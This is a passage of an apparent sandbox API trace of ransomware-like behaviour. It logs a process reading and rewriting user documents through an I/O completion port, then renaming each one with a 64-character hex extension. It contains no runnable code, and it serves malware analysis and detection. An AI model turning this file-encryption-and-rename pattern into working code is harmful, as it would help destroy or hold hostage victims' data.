lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, 
lpOverlapped=0x7690008) returned 1 [0166.758] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.760] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.761] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods", lpString2=".25D772F9A59E93F213C4F9FE184F28BA69D12A7B71611BF8228380DEC517C455" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods.25D772F9A59E93F213C4F9FE184F28BA69D12A7B71611BF8228380DEC517C455") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods.25D772F9A59E93F213C4F9FE184F28BA69D12A7B71611BF8228380DEC517C455" [0166.761] GetProcessHeap () returned 0x270000 [0166.761] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14c) returned 0x76b8af0 [0166.761] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8af0, Length=0x14c, FileInformationClass=0xa) returned 0x0 [0166.763] CloseHandle (hObject=0x598) returned 1 [0166.763] GetProcessHeap () returned 0x270000 [0166.765] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.765] RtlInterlockedCompareExchange64 () returned 0x1 [0166.765] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.769] ReadFile (in: 
hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.769] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.771] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.772] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf", lpString2=".3A9A516757A477E8493C1AF8F352BF2AF300B23989AD6326B1F387D71EC8D74B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf.3A9A516757A477E8493C1AF8F352BF2AF300B23989AD6326B1F387D71EC8D74B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf.3A9A516757A477E8493C1AF8F352BF2AF300B23989AD6326B1F387D71EC8D74B" [0166.772] GetProcessHeap () returned 0x270000 [0166.772] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15c) returned 0x76b8c48 [0166.772] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8c48, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0166.775] CloseHandle (hObject=0x598) returned 1 [0166.775] GetProcessHeap () returned 0x270000 [0166.777] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.778] RtlInterlockedCompareExchange64 () returned 0x1 [0166.778] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, 
lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.785] ReadFile (in: hFile=0x5b0, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.786] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.789] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.790] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx", lpString2=".1DAB52EB8DF9543FC1A26C294E08DA5E39B1D9F2E67D45B7921C1ED6AAC58038" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx.1DAB52EB8DF9543FC1A26C294E08DA5E39B1D9F2E67D45B7921C1ED6AAC58038") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx.1DAB52EB8DF9543FC1A26C294E08DA5E39B1D9F2E67D45B7921C1ED6AAC58038" [0166.790] GetProcessHeap () returned 0x270000 [0166.790] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x76b8db0 [0166.790] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8db0, Length=0x140, FileInformationClass=0xa) returned 0x0 [0166.792] CloseHandle (hObject=0x5b0) returned 1 [0166.793] GetProcessHeap () returned 0x270000 [0166.795] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.795] 
RtlInterlockedCompareExchange64 () returned 0x1 [0166.795] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.800] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.802] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.805] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.806] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf", lpString2=".E22AC00E85F69DE7717CD46D0A9E913768C81024084E9F443C9BC7040C52A24A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf.E22AC00E85F69DE7717CD46D0A9E913768C81024084E9F443C9BC7040C52A24A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf.E22AC00E85F69DE7717CD46D0A9E913768C81024084E9F443C9BC7040C52A24A" [0166.806] GetProcessHeap () returned 0x270000 [0166.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741d418 [0166.806] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x741d418, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0166.808] CloseHandle (hObject=0x598) returned 1 [0166.809] GetProcessHeap () returned 0x270000 
[0166.812] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.812] RtlInterlockedCompareExchange64 () returned 0x1 [0166.812] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.815] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.816] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.818] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.819] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt", lpString2=".08E36FEEF6C8F3F5DE899B87CE8B8874EC64E29E61ACD72BC71DE256C057D62E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt.08E36FEEF6C8F3F5DE899B87CE8B8874EC64E29E61ACD72BC71DE256C057D62E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt.08E36FEEF6C8F3F5DE899B87CE8B8874EC64E29E61ACD72BC71DE256C057D62E" [0166.819] GetProcessHeap () returned 0x270000 [0166.819] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x134) returned 0x42631b8 [0166.819] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x42631b8, Length=0x134, 
FileInformationClass=0xa) returned 0x0 [0166.821] CloseHandle (hObject=0x598) returned 1 [0166.821] GetProcessHeap () returned 0x270000 [0166.822] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.823] RtlInterlockedCompareExchange64 () returned 0x1 [0166.823] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.845] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.846] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.862] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.864] RtlInterlockedCompareExchange64 () returned 0x0 [0166.864] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.881] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.883] RtlInterlockedCompareExchange64 () returned 0x0 [0166.883] GetQueuedCompletionStatus 
(in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.897] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.898] RtlInterlockedCompareExchange64 () returned 0x0 [0166.898] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.911] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.912] RtlInterlockedCompareExchange64 () returned 0x0 [0166.912] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.940] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.941] RtlInterlockedCompareExchange64 () returned 0x0 [0166.941] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.954] 
WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.955] RtlInterlockedCompareExchange64 () returned 0x0 [0166.955] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.967] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.969] RtlInterlockedCompareExchange64 () returned 0x0 [0166.969] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.980] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.981] RtlInterlockedCompareExchange64 () returned 0x0 [0166.981] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.993] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x7200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.994] RtlInterlockedCompareExchange64 () 
returned 0x0 [0166.994] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.009] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x7200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.010] RtlInterlockedCompareExchange64 () returned 0x0 [0167.010] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.021] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x6e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.022] RtlInterlockedCompareExchange64 () returned 0x0 [0167.022] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.041] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.044] RtlInterlockedCompareExchange64 () returned 0x0 [0167.044] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, 
lpOverlapped=0x6fef7f8) returned 1 [0167.179] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.181] RtlInterlockedCompareExchange64 () returned 0x0 [0167.181] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.230] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.231] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx", lpString2=".37AAA64B8CFF5D745FA191F95E033766E05FF0CAA9A6A05282570072EC6F2569" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx.37AAA64B8CFF5D745FA191F95E033766E05FF0CAA9A6A05282570072EC6F2569") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx.37AAA64B8CFF5D745FA191F95E033766E05FF0CAA9A6A05282570072EC6F2569" [0167.231] GetProcessHeap () returned 0x270000 [0167.231] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x741ddd8 [0167.231] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x741ddd8, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0167.235] CloseHandle (hObject=0x5ac) returned 1 [0167.235] GetProcessHeap () returned 0x270000 [0167.236] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.236] RtlInterlockedCompareExchange64 () returned 0x1 [0167.237] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.240] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.241] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.243] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.244] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\skHn.docx", lpString2=".25E21F871A7C1D5F8778D88A3A3000F5FC1E03490ACDC7BEE974619C11014C44" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\skHn.docx.25E21F871A7C1D5F8778D88A3A3000F5FC1E03490ACDC7BEE974619C11014C44") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\skHn.docx.25E21F871A7C1D5F8778D88A3A3000F5FC1E03490ACDC7BEE974619C11014C44" [0167.244] GetProcessHeap () returned 0x270000 [0167.244] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10c) returned 0x4267710 [0167.245] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x4267710, Length=0x10c, FileInformationClass=0xa) returned 0x0 [0167.247] CloseHandle (hObject=0x5ac) returned 1 [0167.248] GetProcessHeap () returned 0x270000 [0167.250] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.250] RtlInterlockedCompareExchange64 () returned 0x1 
[0167.250] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.255] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.255] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.257] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.258] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx", lpString2=".C991FA1CF7B8D92AB9A7B22CFCECD6558C69EFF543629B700C680E33EA996419" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx.C991FA1CF7B8D92AB9A7B22CFCECD6558C69EFF543629B700C680E33EA996419") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx.C991FA1CF7B8D92AB9A7B22CFCECD6558C69EFF543629B700C680E33EA996419" [0167.258] GetProcessHeap () returned 0x270000 [0167.258] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x42f9410 [0167.259] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f9410, Length=0x120, FileInformationClass=0xa) returned 0x0 [0167.261] CloseHandle (hObject=0x5ac) returned 1 [0167.262] GetProcessHeap () returned 0x270000 [0167.263] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: 
